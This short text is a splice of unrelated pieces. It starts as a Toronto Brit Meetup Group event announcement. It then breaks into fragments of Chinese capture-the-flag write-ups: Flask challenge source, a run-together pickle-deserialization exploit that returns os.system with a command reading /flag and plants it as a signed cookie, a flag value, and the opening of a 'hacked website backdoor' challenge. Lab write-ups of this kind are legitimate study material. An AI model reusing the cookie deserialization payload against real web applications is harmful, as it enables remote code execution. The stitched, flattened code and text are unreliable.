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Final one for the year! Please go to theToronto Brit Meetup Group(with Amanda as the organiser), sign up for free and see all the details and receive all the updates. You need to be a member to be able to receive the Zoom link on the night. See you there!
题目主要源码如下 from flask import Flask, render_template, request, render_template_string,redirect from verify import * from User import User import base64 from waf import waf app = Flask(__name__,static_folder="static",template_folder="templates") ...
res=`/flag|base64 -w 0`"return(os.system,(cmd,))@route("/sign")defindex():try:# session={"name":"admin"}session=exp()response.set_cookie("name",session,secret=sekai)return"success"except:return"pls no hax"if__name__=="__main__":os.chdir(os.path.dirname(__file__))run(... 最终flag: flag{c69ec14d9d44ba5ff1122ea5bc89b025} 题目名称:网站被黑 题目内容: 网站被黑了 黑客会不会留下后门 题目wirteup: 启动题目场景,获得靶场网站,访问网站,发现页面是一个黑页 http...